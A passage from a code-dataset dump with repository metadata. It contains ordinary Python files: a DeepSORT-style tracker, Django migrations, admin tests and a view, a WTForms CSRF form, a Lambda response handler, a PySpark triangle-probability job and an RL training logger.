i for i, t in enumerate(self.tracks) if t.is_confirmed()]
unconfirmed_tracks = [
i for i, t in enumerate(self.tracks) if not t.is_confirmed()]
# Associate confirmed tracks using appearance features.
matches_a, unmatched_tracks_a, unmatched_detections = \
linear_assignment.matching_cascade(
gated_metric, self.metric.matching_threshold, self.max_age,
self.tracks, detections, confirmed_tracks)
# Associate remaining tracks together with unconfirmed tracks using IOU.
iou_track_candidates = unconfirmed_tracks + [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update == 1]
unmatched_tracks_a = [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update != 1]
matches_b, unmatched_tracks_b, unmatched_detections = \
linear_assignment.min_cost_matching(
iou_matching.iou_cost, self.max_iou_distance, self.tracks,
detections, iou_track_candidates, unmatched_detections)
matches = matches_a + matches_b
unmatched_tracks = list(set(unmatched_tracks_a + unmatched_tracks_b))
return matches, unmatched_tracks, unmatched_detections
def _initiate_track(self, detection):
mean, covariance = self.kf.initiate(detection.to_toppoint())
self.tracks.append(Track(
mean, covariance, self._next_id, self.n_init, self.max_age,
detection.feature, h=self.H))
self._next_id += 1
| 38.65493
| 102
| 0.647841
|
from __future__ import absolute_import
import numpy as np
from . import kalman_filter
from . import linear_assignment
from . import iou_matching
from .track import Track
class Tracker:
def __init__(self, metric, max_iou_distance=0.7, max_age=70, n_init=3, h = np.identity(3, float)):
self.metric = metric
self.max_iou_distance = max_iou_distance
self.max_age = max_age
self.n_init = n_init
self.kf = kalman_filter.KalmanFilter()
self.tracks = []
self._next_id = 1
self.H = h
def predict(self):
for track in self.tracks:
track.predict(self.kf)
def update(self, detections, h=np.identity(3)):
matches, unmatched_tracks, unmatched_detections = \
self._match(detections)
for track_idx, detection_idx in matches:
self.tracks[track_idx].update(
self.kf, detections[detection_idx])
for track_idx in unmatched_tracks:
self.tracks[track_idx].mark_missed()
for detection_idx in unmatched_detections:
self._initiate_track(detections[detection_idx])
self.tracks = [t for t in self.tracks if not t.is_deleted()]
active_targets = [t.track_id for t in self.tracks if t.is_confirmed()]
features, targets = [], []
for track in self.tracks:
if not track.is_confirmed():
continue
features += track.features
targets += [track.track_id for _ in track.features]
track.features = []
self.metric.partial_fit(
np.asarray(features), np.asarray(targets), active_targets)
def _match(self, detections):
def gated_metric(tracks, dets, track_indices, detection_indices):
features = np.array([dets[i].feature for i in detection_indices])
targets = np.array([tracks[i].track_id for i in track_indices])
cost_matrix = self.metric.distance(features, targets)
print("cost_matrix1:\n", cost_matrix)
cost_matrix = linear_assignment.gate_cost_matrix(
self.kf, cost_matrix, tracks, dets, track_indices,
detection_indices, only_position=True)
print("cost_matrix2:\n", cost_matrix)
return cost_matrix
confirmed_tracks = [
i for i, t in enumerate(self.tracks) if t.is_confirmed()]
unconfirmed_tracks = [
i for i, t in enumerate(self.tracks) if not t.is_confirmed()]
matches_a, unmatched_tracks_a, unmatched_detections = \
linear_assignment.matching_cascade(
gated_metric, self.metric.matching_threshold, self.max_age,
self.tracks, detections, confirmed_tracks)
iou_track_candidates = unconfirmed_tracks + [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update == 1]
unmatched_tracks_a = [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update != 1]
matches_b, unmatched_tracks_b, unmatched_detections = \
linear_assignment.min_cost_matching(
iou_matching.iou_cost, self.max_iou_distance, self.tracks,
detections, iou_track_candidates, unmatched_detections)
matches = matches_a + matches_b
unmatched_tracks = list(set(unmatched_tracks_a + unmatched_tracks_b))
return matches, unmatched_tracks, unmatched_detections
def _initiate_track(self, detection):
mean, covariance = self.kf.initiate(detection.to_toppoint())
self.tracks.append(Track(
mean, covariance, self._next_id, self.n_init, self.max_age,
detection.feature, h=self.H))
self._next_id += 1
| true
| true
|
f707a053e9f789fbed38ab5f7888a21ba291fcc5
| 1,142
|
py
|
Python
|
crewbank/contrib/sites/migrations/0003_set_site_domain_and_name.py
|
mfwarren/CrewBank
|
3f66ca147aef3c589e9c99a33747f1060e4f2d48
|
[
"MIT"
] | 1
|
2017-09-27T19:31:33.000Z
|
2017-09-27T19:31:33.000Z
|
crewbank/contrib/sites/migrations/0003_set_site_domain_and_name.py
|
mfwarren/CrewBank
|
3f66ca147aef3c589e9c99a33747f1060e4f2d48
|
[
"MIT"
] | null | null | null |
crewbank/contrib/sites/migrations/0003_set_site_domain_and_name.py
|
mfwarren/CrewBank
|
3f66ca147aef3c589e9c99a33747f1060e4f2d48
|
[
"MIT"
] | null | null | null |
"""
To understand why this file is here, please read:
http://cookiecutter-django.readthedocs.io/en/latest/faq.html#why-is-there-a-django-contrib-sites-directory-in-cookiecutter-django
"""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'crewbank.io',
'name': 'CrewBank'
}
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'example.com',
'name': 'example.com'
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
| 24.297872
| 129
| 0.644483
|
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'crewbank.io',
'name': 'CrewBank'
}
)
def update_site_backward(apps, schema_editor):
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'example.com',
'name': 'example.com'
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
| true
| true
|
f707a13f011a146ede9e74be4a032cc3cf065b90
| 1,296
|
py
|
Python
|
app/core/tests/test_admin.py
|
anamgajith/recipe-app-api
|
0624c3b5c5c3a559338af3623cf015f70f6a1ae0
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
anamgajith/recipe-app-api
|
0624c3b5c5c3a559338af3623cf015f70f6a1ae0
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
anamgajith/recipe-app-api
|
0624c3b5c5c3a559338af3623cf015f70f6a1ae0
|
[
"MIT"
] | null | null | null |
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@test.com",
password="test123"
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@test.com",
password="test123",
name="Test User"
)
def test_users_listed(self):
"""Test if the user listed on the user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 32.4
| 68
| 0.635802
|
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@test.com",
password="test123"
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@test.com",
password="test123",
name="Test User"
)
def test_users_listed(self):
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| true
| true
|
f707a156552ddcfec82940e0985328a092287f89
| 239
|
py
|
Python
|
login/views.py
|
techonerd/Social-Connect
|
cde7107cbe6720291a0d47ec96f48a6619396934
|
[
"Apache-2.0"
] | null | null | null |
login/views.py
|
techonerd/Social-Connect
|
cde7107cbe6720291a0d47ec96f48a6619396934
|
[
"Apache-2.0"
] | 1
|
2021-12-23T00:09:12.000Z
|
2021-12-23T00:09:12.000Z
|
login/views.py
|
techonerd/Social-Connect
|
cde7107cbe6720291a0d47ec96f48a6619396934
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
def index(request):
# return HttpResponse("Hello, world. You're at the polls index.")
return render(request, 'login/index.html')
| 26.555556
| 69
| 0.74477
|
from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return render(request, 'login/index.html')
| true
| true
|
f707a15fb2b735f5f3a39861cca6ed24348a8788
| 305
|
py
|
Python
|
lambda_utils/response_handlers/__init__.py
|
Christoph-Schabert/lambda-utils
|
2d9628df4e10190bb5f50b3ca3910b5d2743e060
|
[
"MIT"
] | 2
|
2017-02-12T19:40:36.000Z
|
2017-06-23T07:47:18.000Z
|
lambda_utils/response_handlers/__init__.py
|
Christoph-Schabert/lambda-utils
|
2d9628df4e10190bb5f50b3ca3910b5d2743e060
|
[
"MIT"
] | 353
|
2017-02-12T18:34:18.000Z
|
2019-04-03T17:47:36.000Z
|
lambda_utils/response_handlers/__init__.py
|
Christoph-Schabert/lambda-utils
|
2d9628df4e10190bb5f50b3ca3910b5d2743e060
|
[
"MIT"
] | 1
|
2017-12-08T12:14:23.000Z
|
2017-12-08T12:14:23.000Z
|
import logging
class BaseResponseHandler:
def on_execution(self, event):
logging.debug(event)
return event
def on_exception(self, ex):
logging.exception(str(ex))
raise
def on_response(self, response):
logging.debug(response)
return response
| 19.0625
| 36
| 0.642623
|
import logging
class BaseResponseHandler:
def on_execution(self, event):
logging.debug(event)
return event
def on_exception(self, ex):
logging.exception(str(ex))
raise
def on_response(self, response):
logging.debug(response)
return response
| true
| true
|
f707a2a773eb93042cddc4014578334f97a08dbd
| 4,750
|
py
|
Python
|
src/rdd_bs.py
|
papaemman/Mining-of-Massive-Datasets-AUTh
|
99a92e133bb21e4a86e9f7b3b704d258007d5f15
|
[
"MIT"
] | null | null | null |
src/rdd_bs.py
|
papaemman/Mining-of-Massive-Datasets-AUTh
|
99a92e133bb21e4a86e9f7b3b704d258007d5f15
|
[
"MIT"
] | null | null | null |
src/rdd_bs.py
|
papaemman/Mining-of-Massive-Datasets-AUTh
|
99a92e133bb21e4a86e9f7b3b704d258007d5f15
|
[
"MIT"
] | 2
|
2021-08-31T20:29:22.000Z
|
2021-10-01T10:20:16.000Z
|
from pyspark import SparkContext
import sys
import time
# Put node with smaller id as src of edge and node with bigger id as dst.
def reOrderingSrcAndDstOfEgde(x:list)-> tuple:
src = x[0]
dst = x[1]
probability = x[2]
if src < dst:
return (src,(dst,probability))
else:
return (dst,(src,probability))
# Find which edges must exist to create triangles with bases a specific node
# Returns also all the already existig edges.
def findEdgesToSearchToCalculateAllTriangles(node:str, listOfEdges:list)-> list:
listOfEdges.sort(key= lambda x: x[0])
edgesToSearchAndEdgesThatExist = list()
for index,edge in enumerate(listOfEdges):
dstNode = edge[0]
edge_probability = edge[1]
edgesToSearchAndEdgesThatExist.append( ((node,dstNode), (edge_probability,"-1")) ) # The edges that exist. The "-1" is a flag that shows that this edge exist
for edge2 in listOfEdges[index + 1:]: # Calculate all the edges that are need to create triangles with basis this node
# The value "X" is dummy and is need in order to have the same structure in all key-value pairs
# The node in the key-value pair shows which node needs this edge to create a triangle
edgesToSearchAndEdgesThatExist.append( ((dstNode,edge2[0]), ("X",node)) )
return edgesToSearchAndEdgesThatExist
# return the edges that were searched to calculate the existing triangles to the nodes that need them
# returns also the edges to the node from which they were extracted
def returnTheSearchedEdgesThatExist(edge:tuple, listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles:list)-> tuple:
listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles.sort(key= lambda x: x[1]) # put fisrt element of the list the key-value pair that shows if edge exist
edgesToReturn = list()
if listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][1] == "-1": # Edge exist in the graph
edgeProbability = listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][0]
edgesToReturn.append( (edge[0],(edge,edgeProbability)) )
for keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle in listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[1:]:
edgesToReturn.append( (keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle[1], (edge,edgeProbability)) )
return edgesToReturn
else: # Edge doesn't exist in the graph
return edgesToReturn # edgesToReturn = []
# Finds the triangles that exist with basis a node and their probabilities
def calculateTriangles(node, listOfEdges:list)-> list:
listOfEdges.sort(reverse=True,key= lambda x: x[0][0])
edges_dic = dict((key,value) for key, value in listOfEdges)
trianglesThatExist = list()
for edge1 in listOfEdges:
if edge1[0][0] > node: # triangle exist with bases this node
edge2 = (node,edge1[0][0])
edge3 = (node,edge1[0][1])
triangleName = node + "," + edge1[0][0] + "," + edge1[0][1]
triangleProbability = float(edges_dic[edge1[0]]) * float(edges_dic[edge2]) * float(edges_dic[edge3])
trianglesThatExist.append((triangleName,triangleProbability))
else: # no triangle exist with bases this node
break
return trianglesThatExist
def main(TopK:str):
sc = SparkContext(appName="Top-k most probable triangles")
# edgesRDD = sc.textFile("./input/ex.csv")
# edgesRDD = sc.textFile("./input/collins.csv")
# edgesRDD = sc.textFile("./input/ex_exploit_bug.csv")
edgesRDD = sc.textFile("./input/artists_uniform.csv")
# artists_uniform.csv, artists_normal.csv, artists_power_law.csv
trianglesRDD = edgesRDD \
.map(lambda x: x.split(",")) \
.map(lambda x: reOrderingSrcAndDstOfEgde(x)) \
.groupByKey() \
.flatMap(lambda x: findEdgesToSearchToCalculateAllTriangles(x[0],list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: returnTheSearchedEdgesThatExist(x[0], list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: calculateTriangles(x[0], list(x[1]))) \
.sortBy(lambda x: x[1], ascending=False) \
.take(int(TopK))
# .count()
# print(trianglesRDD)
# for triangle in trianglesRDD:
# print(triangle)
sc.stop()
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Give k as input")
sys.exit()
start = time.time()
main(sys.argv[1])
end = time.time()
print("Execution time : " + str(end - start))
| 42.410714
| 172
| 0.666316
|
from pyspark import SparkContext
import sys
import time
def reOrderingSrcAndDstOfEgde(x:list)-> tuple:
src = x[0]
dst = x[1]
probability = x[2]
if src < dst:
return (src,(dst,probability))
else:
return (dst,(src,probability))
def findEdgesToSearchToCalculateAllTriangles(node:str, listOfEdges:list)-> list:
listOfEdges.sort(key= lambda x: x[0])
edgesToSearchAndEdgesThatExist = list()
for index,edge in enumerate(listOfEdges):
dstNode = edge[0]
edge_probability = edge[1]
edgesToSearchAndEdgesThatExist.append( ((node,dstNode), (edge_probability,"-1")) ) for edge2 in listOfEdges[index + 1:]: edgesToSearchAndEdgesThatExist.append( ((dstNode,edge2[0]), ("X",node)) )
return edgesToSearchAndEdgesThatExist
def returnTheSearchedEdgesThatExist(edge:tuple, listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles:list)-> tuple:
listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles.sort(key= lambda x: x[1]) edgesToReturn = list()
if listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][1] == "-1": edgeProbability = listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][0]
edgesToReturn.append( (edge[0],(edge,edgeProbability)) )
for keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle in listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[1:]:
edgesToReturn.append( (keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle[1], (edge,edgeProbability)) )
return edgesToReturn
else: return edgesToReturn # edgesToReturn = []
# Finds the triangles that exist with basis a node and their probabilities
def calculateTriangles(node, listOfEdges:list)-> list:
listOfEdges.sort(reverse=True,key= lambda x: x[0][0])
edges_dic = dict((key,value) for key, value in listOfEdges)
trianglesThatExist = list()
for edge1 in listOfEdges:
if edge1[0][0] > node: # triangle exist with bases this node
edge2 = (node,edge1[0][0])
edge3 = (node,edge1[0][1])
triangleName = node + "," + edge1[0][0] + "," + edge1[0][1]
triangleProbability = float(edges_dic[edge1[0]]) * float(edges_dic[edge2]) * float(edges_dic[edge3])
trianglesThatExist.append((triangleName,triangleProbability))
else: # no triangle exist with bases this node
break
return trianglesThatExist
def main(TopK:str):
sc = SparkContext(appName="Top-k most probable triangles")
# edgesRDD = sc.textFile("./input/ex.csv")
# edgesRDD = sc.textFile("./input/collins.csv")
# edgesRDD = sc.textFile("./input/ex_exploit_bug.csv")
edgesRDD = sc.textFile("./input/artists_uniform.csv")
# artists_uniform.csv, artists_normal.csv, artists_power_law.csv
trianglesRDD = edgesRDD \
.map(lambda x: x.split(",")) \
.map(lambda x: reOrderingSrcAndDstOfEgde(x)) \
.groupByKey() \
.flatMap(lambda x: findEdgesToSearchToCalculateAllTriangles(x[0],list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: returnTheSearchedEdgesThatExist(x[0], list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: calculateTriangles(x[0], list(x[1]))) \
.sortBy(lambda x: x[1], ascending=False) \
.take(int(TopK))
# .count()
# print(trianglesRDD)
# for triangle in trianglesRDD:
# print(triangle)
sc.stop()
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Give k as input")
sys.exit()
start = time.time()
main(sys.argv[1])
end = time.time()
print("Execution time : " + str(end - start))
| true
| true
|
f707a2cda281657a347a6780a6cd2b1bcc1cb279
| 1,786
|
py
|
Python
|
venv/lib/python3.6/site-packages/wtforms/ext/csrf/form.py
|
aitoehigie/britecore_flask
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
[
"MIT"
] | null | null | null |
venv/lib/python3.6/site-packages/wtforms/ext/csrf/form.py
|
aitoehigie/britecore_flask
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
[
"MIT"
] | 1
|
2021-06-01T23:32:38.000Z
|
2021-06-01T23:32:38.000Z
|
venv/lib/python3.6/site-packages/wtforms/ext/csrf/form.py
|
aitoehigie/britecore_flask
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from wtforms.form import Form
from wtforms.validators import ValidationError
from .fields import CSRFTokenField
class SecureForm(Form):
"""
Form that enables CSRF processing via subclassing hooks.
"""
csrf_token = CSRFTokenField()
def __init__(self, formdata=None, obj=None, prefix="", csrf_context=None, **kwargs):
"""
:param csrf_context:
Optional extra data which is passed transparently to your
CSRF implementation.
"""
super(SecureForm, self).__init__(formdata, obj, prefix, **kwargs)
self.csrf_token.current_token = self.generate_csrf_token(csrf_context)
def generate_csrf_token(self, csrf_context):
"""
Implementations must override this to provide a method with which one
can get a CSRF token for this form.
A CSRF token should be a string which can be generated
deterministically so that on the form POST, the generated string is
(usually) the same assuming the user is using the site normally.
:param csrf_context:
A transparent object which can be used as contextual info for
generating the token.
"""
raise NotImplementedError()
def validate_csrf_token(self, field):
"""
Override this method to provide custom CSRF validation logic.
The default CSRF validation logic simply checks if the recently
generated token equals the one we received as formdata.
"""
if field.current_token != field.data:
raise ValidationError(field.gettext("Invalid CSRF Token"))
@property
def data(self):
d = super(SecureForm, self).data
d.pop("csrf_token")
return d
| 32.472727
| 88
| 0.666853
|
from __future__ import unicode_literals
from wtforms.form import Form
from wtforms.validators import ValidationError
from .fields import CSRFTokenField
class SecureForm(Form):
csrf_token = CSRFTokenField()
def __init__(self, formdata=None, obj=None, prefix="", csrf_context=None, **kwargs):
super(SecureForm, self).__init__(formdata, obj, prefix, **kwargs)
self.csrf_token.current_token = self.generate_csrf_token(csrf_context)
def generate_csrf_token(self, csrf_context):
raise NotImplementedError()
def validate_csrf_token(self, field):
if field.current_token != field.data:
raise ValidationError(field.gettext("Invalid CSRF Token"))
@property
def data(self):
d = super(SecureForm, self).data
d.pop("csrf_token")
return d
| true
| true
|
f707a2f41d8e690e8b8403065e8ca856caf1f920
| 8,370
|
py
|
Python
|
meta_logger.py
|
moojink/drq
|
e05c337aeb6fcae30c2db6e4afaca65e94511bbd
|
[
"MIT"
] | null | null | null |
meta_logger.py
|
moojink/drq
|
e05c337aeb6fcae30c2db6e4afaca65e94511bbd
|
[
"MIT"
] | null | null | null |
meta_logger.py
|
moojink/drq
|
e05c337aeb6fcae30c2db6e4afaca65e94511bbd
|
[
"MIT"
] | null | null | null |
import csv
import json
import os
import shutil
from collections import defaultdict
import numpy as np
import torch
import torchvision
from termcolor import colored
from torch.utils.tensorboard import SummaryWriter
COMMON_TRAIN_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float'),
('duration', 'D', 'time')]
COMMON_EVAL_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float')]
AGENT_TRAIN_FORMAT = {
'drq': [('batch_reward', 'BR', 'float'), ('actor_loss', 'ALOSS', 'float'),
('critic_loss', 'CLOSS', 'float'),
('alpha_loss', 'TLOSS', 'float'), ('alpha_value', 'TVAL', 'float'),
('actor_entropy', 'AENT', 'float')]
}
class AverageMeter(object):
def __init__(self):
self._sum = 0
self._count = 0
def update(self, value, n=1):
self._sum += value
self._count += n
def value(self):
return self._sum / max(1, self._count)
class MetersGroup(object):
def __init__(self, file_name, formating):
self._csv_file_name = self._prepare_file(file_name, 'csv')
self._formating = formating
self._meters = defaultdict(AverageMeter)
self._csv_file = open(self._csv_file_name, 'w')
self._csv_writer = None
def _prepare_file(self, prefix, suffix):
file_name = f'{prefix}.{suffix}'
if os.path.exists(file_name):
os.remove(file_name)
return file_name
def log(self, key, value, n=1):
self._meters[key].update(value, n)
def _prime_meters(self):
data = dict()
for key, meter in self._meters.items():
if key.startswith('train'):
key = key[len('train') + 1:]
else:
key = key[len('eval') + 1:]
key = key.replace('/', '_')
data[key] = meter.value()
return data
def _dump_to_csv(self, data):
if self._csv_writer is None:
self._csv_writer = csv.DictWriter(self._csv_file,
fieldnames=sorted(data.keys()),
restval=0.0)
self._csv_writer.writeheader()
self._csv_writer.writerow(data)
self._csv_file.flush()
def _format(self, key, value, ty):
if ty == 'int':
value = int(value)
return f'{key}: {value}'
elif ty == 'float':
return f'{key}: {value:.04f}'
elif ty == 'time':
return f'{key}: {value:04.1f} s'
else:
raise f'invalid format type: {ty}'
def _dump_to_console(self, data, prefix):
prefix = colored(prefix, 'yellow' if prefix == 'train' else 'green')
pieces = [f'| {prefix: <14}']
for key, disp_key, ty in self._formating:
value = data.get(key, 0)
pieces.append(self._format(disp_key, value, ty))
print(' | '.join(pieces))
def dump(self, step, prefix, save=True):
if len(self._meters) == 0:
return
if save:
data = self._prime_meters()
data['step'] = step
self._dump_to_csv(data)
self._dump_to_console(data, prefix)
self._meters.clear()
class Logger(object):
def __init__(self,
log_dir,
save_tb=False,
log_frequency=10000,
action_repeat=1,
agent='drq'):
self._log_dir = log_dir
self._log_frequency = log_frequency
self._action_repeat = action_repeat
if save_tb:
tb_dir = os.path.join(log_dir, 'tb')
if os.path.exists(tb_dir):
try:
shutil.rmtree(tb_dir)
except:
print("logger.py warning: Unable to remove tb directory")
pass
self._sw = SummaryWriter(tb_dir)
else:
self._sw = None
# each agent has specific output format for training
assert agent in AGENT_TRAIN_FORMAT
train_format = COMMON_TRAIN_FORMAT + AGENT_TRAIN_FORMAT[agent]
self._train_mg = MetersGroup(os.path.join(log_dir, 'train'),
formating=train_format)
self._eval_mg = MetersGroup(os.path.join(log_dir, 'eval'),
formating=COMMON_EVAL_FORMAT)
def _should_log(self, step, log_frequency):
log_frequency = log_frequency or self._log_frequency
return step % log_frequency == 0
def _update_step(self, step):
return step * self._action_repeat
def _try_sw_log(self, key, value, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_scalar(key, value, step)
def _try_sw_log_image(self, key, image, step):
step = self._update_step(step)
if self._sw is not None:
assert image.dim() == 3
grid = torchvision.utils.make_grid(image.unsqueeze(1))
self._sw.add_image(key, grid, step)
def _try_sw_log_video(self, key, frames, step):
step = self._update_step(step)
if self._sw is not None:
frames = torch.from_numpy(np.array(frames))
frames = frames.unsqueeze(0)
self._sw.add_video(key, frames, step, fps=30)
def _try_sw_log_histogram(self, key, histogram, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_histogram(key, histogram, step)
def log(self, key, value, step, n=1, log_frequency=1):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def eval_log(self, key, value, step, n=1, log_frequency=1):
"""Same as self.log(), except we don't call self._should_log().
In other words, we always log."""
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def log_param(self, key, param, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
self.log_histogram(key + '_w', param.weight.data, step)
if hasattr(param.weight, 'grad') and param.weight.grad is not None:
self.log_histogram(key + '_w_g', param.weight.grad.data, step)
if hasattr(param, 'bias') and hasattr(param.bias, 'data'):
self.log_histogram(key + '_b', param.bias.data, step)
if hasattr(param.bias, 'grad') and param.bias.grad is not None:
self.log_histogram(key + '_b_g', param.bias.grad.data, step)
def log_image(self, key, image, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_image(key, image, step)
def log_video(self, key, frames, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_video(key, frames, step)
def log_histogram(self, key, histogram, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_histogram(key, histogram, step)
def dump(self, step, save=True, ty=None):
step = self._update_step(step)
if ty is None:
self._train_mg.dump(step, 'train', save)
self._eval_mg.dump(step, 'eval', save)
elif ty == 'eval':
self._eval_mg.dump(step, 'eval', save)
elif ty == 'train':
self._train_mg.dump(step, 'train', save)
else:
raise f'invalid log type: {ty}'
| 36.391304
| 79
| 0.573357
|
import csv
import json
import os
import shutil
from collections import defaultdict
import numpy as np
import torch
import torchvision
from termcolor import colored
from torch.utils.tensorboard import SummaryWriter
COMMON_TRAIN_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float'),
('duration', 'D', 'time')]
COMMON_EVAL_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float')]
AGENT_TRAIN_FORMAT = {
'drq': [('batch_reward', 'BR', 'float'), ('actor_loss', 'ALOSS', 'float'),
('critic_loss', 'CLOSS', 'float'),
('alpha_loss', 'TLOSS', 'float'), ('alpha_value', 'TVAL', 'float'),
('actor_entropy', 'AENT', 'float')]
}
class AverageMeter(object):
def __init__(self):
self._sum = 0
self._count = 0
def update(self, value, n=1):
self._sum += value
self._count += n
def value(self):
return self._sum / max(1, self._count)
class MetersGroup(object):
def __init__(self, file_name, formating):
self._csv_file_name = self._prepare_file(file_name, 'csv')
self._formating = formating
self._meters = defaultdict(AverageMeter)
self._csv_file = open(self._csv_file_name, 'w')
self._csv_writer = None
def _prepare_file(self, prefix, suffix):
file_name = f'{prefix}.{suffix}'
if os.path.exists(file_name):
os.remove(file_name)
return file_name
def log(self, key, value, n=1):
self._meters[key].update(value, n)
def _prime_meters(self):
data = dict()
for key, meter in self._meters.items():
if key.startswith('train'):
key = key[len('train') + 1:]
else:
key = key[len('eval') + 1:]
key = key.replace('/', '_')
data[key] = meter.value()
return data
def _dump_to_csv(self, data):
if self._csv_writer is None:
self._csv_writer = csv.DictWriter(self._csv_file,
fieldnames=sorted(data.keys()),
restval=0.0)
self._csv_writer.writeheader()
self._csv_writer.writerow(data)
self._csv_file.flush()
def _format(self, key, value, ty):
if ty == 'int':
value = int(value)
return f'{key}: {value}'
elif ty == 'float':
return f'{key}: {value:.04f}'
elif ty == 'time':
return f'{key}: {value:04.1f} s'
else:
raise f'invalid format type: {ty}'
def _dump_to_console(self, data, prefix):
prefix = colored(prefix, 'yellow' if prefix == 'train' else 'green')
pieces = [f'| {prefix: <14}']
for key, disp_key, ty in self._formating:
value = data.get(key, 0)
pieces.append(self._format(disp_key, value, ty))
print(' | '.join(pieces))
def dump(self, step, prefix, save=True):
if len(self._meters) == 0:
return
if save:
data = self._prime_meters()
data['step'] = step
self._dump_to_csv(data)
self._dump_to_console(data, prefix)
self._meters.clear()
class Logger(object):
def __init__(self,
log_dir,
save_tb=False,
log_frequency=10000,
action_repeat=1,
agent='drq'):
self._log_dir = log_dir
self._log_frequency = log_frequency
self._action_repeat = action_repeat
if save_tb:
tb_dir = os.path.join(log_dir, 'tb')
if os.path.exists(tb_dir):
try:
shutil.rmtree(tb_dir)
except:
print("logger.py warning: Unable to remove tb directory")
pass
self._sw = SummaryWriter(tb_dir)
else:
self._sw = None
assert agent in AGENT_TRAIN_FORMAT
